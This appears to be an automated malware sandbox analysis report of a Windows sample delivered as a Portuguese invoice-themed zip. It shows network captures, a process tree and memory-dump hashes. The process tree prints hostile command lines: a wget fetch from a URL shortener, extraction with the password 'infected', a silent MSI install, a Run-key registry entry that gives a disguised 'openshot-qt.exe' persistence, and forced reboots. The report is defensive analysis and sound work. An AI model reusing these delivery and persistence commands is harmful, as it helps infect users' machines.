                                                                  2023-04-26 07:00:20 UTC4892INHTTP/1.1 200 OK
                                                                  Content-Type: application/json; charset=utf-8
                                                                  Access-Control-Allow-Origin: https://www.google.com
                                                                  Access-Control-Allow-Credentials: true
                                                                  X-Content-Type-Options: nosniff
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Wed, 26 Apr 2023 07:00:20 GMT
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-vwsWlS4q6QDqfTByzR696w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                  Server: ESF
                                                                  X-XSS-Protection: 0
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Accept-Ranges: none
                                                                  Vary: Accept-Encoding
                                                                  Connection: close
                                                                  Transfer-Encoding: chunked
                                                                  2023-04-26 07:00:20 UTC4894INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                  Data Ascii: 11["gaia.l.a.r",[]]
                                                                  2023-04-26 07:00:20 UTC4894INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  9192.168.2.34970867.199.248.11443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:00:21 UTC4998OUTGET /3oDy7mm HTTP/1.1
                                                                  Host: bit.ly
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2023-04-26 07:00:21 UTC5002INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Wed, 26 Apr 2023 07:00:21 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 162
                                                                  Cache-Control: private, max-age=90
                                                                  Content-Security-Policy: referrer always;
                                                                  Location: https://i1.wp.com/flevix.com/wp-content/uploads/2019/07/Focus-Loading-1.gif
                                                                  Referrer-Policy: unsafe-url
                                                                  Set-Cookie: _bit=n3q70l-2d6723c07c977a6d57-00I; Domain=bit.ly; Expires=Mon, 23 Oct 2023 07:00:21 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2023-04-26 07:00:21 UTC5002INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 31 2e 77 70 2e 63 6f 6d 2f 66 6c 65 76 69 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 39 2f 30 37 2f 46 6f 63 75 73 2d 4c 6f 61 64 69 6e 67 2d 31 2e 67 69 66 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://i1.wp.com/flevix.com/wp-content/uploads/2019/07/Focus-Loading-1.gif">moved here</a></body></html>


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:09:00:09
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://tinyurl.com/2abosd8k" > cmdline.out 2>&1
                                                                  Imagebase:0xb0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:1
                                                                  Start time:09:00:09
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:2
                                                                  Start time:09:00:09
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\wget.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://tinyurl.com/2abosd8k"
                                                                  Imagebase:0x400000
                                                                  File size:3895184 bytes
                                                                  MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:3
                                                                  Start time:09:00:16
                                                                  Start date:26/04/2023
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\download\empresa01.html
                                                                  Imagebase:0x7ff614650000
                                                                  File size:2851656 bytes
                                                                  MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:4
                                                                  Start time:09:00:17
                                                                  Start date:26/04/2023
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1764 --field-trial-handle=1816,i,4260702216927358363,7023541832913782999,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                  Imagebase:0x7ff614650000
                                                                  File size:2851656 bytes
                                                                  MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:7
                                                                  Start time:09:00:32
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\unarchiver.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Or amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zip
                                                                  Imagebase:0x2e0000
                                                                  File size:12800 bytes
                                                                  MD5 hash:16FF3CC6CC330A08EED70CBC1D35F5D2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:low

                                                                  Target ID:8
                                                                  Start time:09:00:32
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\7za.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx" "C:\Users\user\Downloads\Or amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zip
                                                                  Imagebase:0xb00000
                                                                  File size:289792 bytes
                                                                  MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:10
                                                                  Start time:09:00:32
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:12
                                                                  Start time:09:00:33
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msi
                                                                  Imagebase:0xb0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:13
                                                                  Start time:09:00:34
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:14
                                                                  Start time:09:00:34
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msi"
                                                                  Imagebase:0x1320000
                                                                  File size:59904 bytes
                                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:15
                                                                  Start time:09:00:35
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                  Imagebase:0x7ff6ca150000
                                                                  File size:66048 bytes
                                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:17
                                                                  Start time:09:00:37
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 497B8A54F042C624761329931378FB15
                                                                  Imagebase:0x1320000
                                                                  File size:59904 bytes
                                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:22
                                                                  Start time:09:01:14
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe""
                                                                  Imagebase:0xb0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:23
                                                                  Start time:09:01:15
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:24
                                                                  Start time:09:01:15
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"""
                                                                  Imagebase:0xa90000
                                                                  File size:59392 bytes
                                                                  MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:25
                                                                  Start time:09:01:16
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:26
                                                                  Start time:09:01:21
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60
                                                                  Imagebase:0xb0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:27
                                                                  Start time:09:01:21
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:28
                                                                  Start time:09:01:22
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\shutdown.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:shutdown -r -f -t 60
                                                                  Imagebase:0xe70000
                                                                  File size:23552 bytes
                                                                  MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:29
                                                                  Start time:09:01:27
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f
                                                                  Imagebase:0xb0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:30
                                                                  Start time:09:01:27
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:31
                                                                  Start time:09:01:28
                                                                  Start date:26/04/2023
                                                                  Path:C:\Windows\SysWOW64\shutdown.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:shutdown /r /t 1 /f
                                                                  Imagebase:0xe70000
                                                                  File size:23552 bytes
                                                                  MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:32
                                                                  Start time:09:01:30
                                                                  Start date:26/04/2023
                                                                  Path:C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"
                                                                  Imagebase:0x300000
                                                                  File size:330240 bytes
                                                                  MD5 hash:29C35D09065CC6A59E2C5C88175C91ED
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Reputation:low

                                                                  Target ID:33
                                                                  Start time:09:01:38
                                                                  Start date:26/04/2023
                                                                  Path:C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"
                                                                  Imagebase:0x300000
                                                                  File size:330240 bytes
                                                                  MD5 hash:29C35D09065CC6A59E2C5C88175C91ED
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:low

                                                                  Reset < >
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445890655.0000000002600000.00000040.00000020.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2600000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 91fe1b79cf5661581409830197997707e189a85c86d7a3560846781adc1bca71
                                                                    • Instruction ID: b51b2bb07f044e2629157718368f2fa54e180d780a0df2dd3ee8b4fb18e5af49
                                                                    • Opcode Fuzzy Hash: 91fe1b79cf5661581409830197997707e189a85c86d7a3560846781adc1bca71
                                                                    • Instruction Fuzzy Hash: FB21B15258D3C08FE30397649C5A9A27FF09E53220F1EC5DFC4848F5A3E219591AD7A3
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 26b80902bd907095731daa432978c9d5168685e8e304681e6701d0f1e2c676a2
                                                                    • Instruction ID: a1083c2dc0e3dc8101bc7d615d54298c09f459e0f7714d9cf81720a2309ccf77
                                                                    • Opcode Fuzzy Hash: 26b80902bd907095731daa432978c9d5168685e8e304681e6701d0f1e2c676a2
                                                                    • Instruction Fuzzy Hash: 09B18F36B1A210DFC758EF74E955A6E7BB2FF88354B108828D5469F3A4CB349D81CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74deb6cb4963986ee59aa7fe72923c2d3a965abb52094c42dbdc76e5a7ae7e19
                                                                    • Instruction ID: ba530826ced1bfca25cf3ec50f14cf5678bf4884b5501e9db10615bf56fe3caa
                                                                    • Opcode Fuzzy Hash: 74deb6cb4963986ee59aa7fe72923c2d3a965abb52094c42dbdc76e5a7ae7e19
                                                                    • Instruction Fuzzy Hash: 36A17031B142158BDB14AB78D9667BF76E3FFC4308F148828D9069B394DF789C828B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b5f7c59ccfe540c6aa7a43642abe37d14268a16cf02aff1c9f166c38f8a7dfc
                                                                    • Instruction ID: 6b6eef206bb094b9a5d006884d049d2c63545a786d103d787519ce5ad4b9cf0f
                                                                    • Opcode Fuzzy Hash: 9b5f7c59ccfe540c6aa7a43642abe37d14268a16cf02aff1c9f166c38f8a7dfc
                                                                    • Instruction Fuzzy Hash: 83819F31B142158FDB14EB78D9667AE7BE2FF84308F148828D5069B395DF789C82CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 99d05fd02eb36fa84135f771a40489dd11b9eb4da799536d63f59a9867bd6010
                                                                    • Instruction ID: b5af6c699575458a80492536a0c3cf12b90d36bde418063f5a07aacabf8b282e
                                                                    • Opcode Fuzzy Hash: 99d05fd02eb36fa84135f771a40489dd11b9eb4da799536d63f59a9867bd6010
                                                                    • Instruction Fuzzy Hash: FB21F670B042404FCB15EB3995527AF7FD3AFC5208B04482CD546DB781CF79A9468796
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74962db57b555de7295b4e0a1dbc7f2f4f0bbe5ff27e9d181b794392e06824f4
                                                                    • Instruction ID: bfee7d4bde8e825e8b61f4264bf4a3c1704c2e9dc101714a0d80f612fca76bdb
                                                                    • Opcode Fuzzy Hash: 74962db57b555de7295b4e0a1dbc7f2f4f0bbe5ff27e9d181b794392e06824f4
                                                                    • Instruction Fuzzy Hash: B821F370B042008BCB24EB39C5517AFBBD7AFC5218B44883CD146DB781DF79A9468796
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445890655.0000000002600000.00000040.00000020.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2600000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a41ed7b07d75c01775b52776592eef8de432c276b17aa1a60aaf48a61abd9e1d
                                                                    • Instruction ID: 0ac37acb0469d2972093ee19cc0035d5b9518767601fcfb4f437d6bcdd0f9a7c
                                                                    • Opcode Fuzzy Hash: a41ed7b07d75c01775b52776592eef8de432c276b17aa1a60aaf48a61abd9e1d
                                                                    • Instruction Fuzzy Hash: C921B0B24092506FD701DF15EC41896FBE8DF96220B18C56FEC4D8A601E33AA9198BE2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 159c36b7a555444d9036962bdb95f6126c40afc560080e6121ea7bbf9b23e9eb
                                                                    • Instruction ID: a86105216c9908c277c9fbfefaa0dde0fd5ad7f71e61e0d289953894e6f89931
                                                                    • Opcode Fuzzy Hash: 159c36b7a555444d9036962bdb95f6126c40afc560080e6121ea7bbf9b23e9eb
                                                                    • Instruction Fuzzy Hash: A111D336A14214AFCF019FB4D885DDF7BF2AF88214B104979E105E7365DB35980ACB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c712691e5d1b355a71e67f659f728fe3813abe1ad3ba39647f147d91fee494f0
                                                                    • Instruction ID: 405706308ddf1f6282e9c9db734cfa60fa0f4ed46d18d35545017fc27e4a4cf2
                                                                    • Opcode Fuzzy Hash: c712691e5d1b355a71e67f659f728fe3813abe1ad3ba39647f147d91fee494f0
                                                                    • Instruction Fuzzy Hash: B8119136B10214AFCF05ABB4D84599FBBF6BF88214B114979E205EB364DB35AC49CBD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445890655.0000000002600000.00000040.00000020.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2600000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20e6df344cf0026eeaeb5c1188161ae68c23941a7f84eeebc8cb54c81b369b9b
                                                                    • Instruction ID: 9f6926a6b549f1ffc4fbf5c3070563226db411395f8c6c87e445db43517fff1b
                                                                    • Opcode Fuzzy Hash: 20e6df344cf0026eeaeb5c1188161ae68c23941a7f84eeebc8cb54c81b369b9b
                                                                    • Instruction Fuzzy Hash: F7018B755093805FD7128F16DC54862FFB8EF46620749C4DBEC498B611D3256905CBB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445890655.0000000002600000.00000040.00000020.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2600000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8f7d47de9252ea5ef6c86fdf67cee913f0f953879fb3eacec84fcd2bd57a14ca
                                                                    • Instruction ID: d523d5e496eb40ed4a339e3494805065d18a8135b4a0222d1081e99f95bd7cf3
                                                                    • Opcode Fuzzy Hash: 8f7d47de9252ea5ef6c86fdf67cee913f0f953879fb3eacec84fcd2bd57a14ca
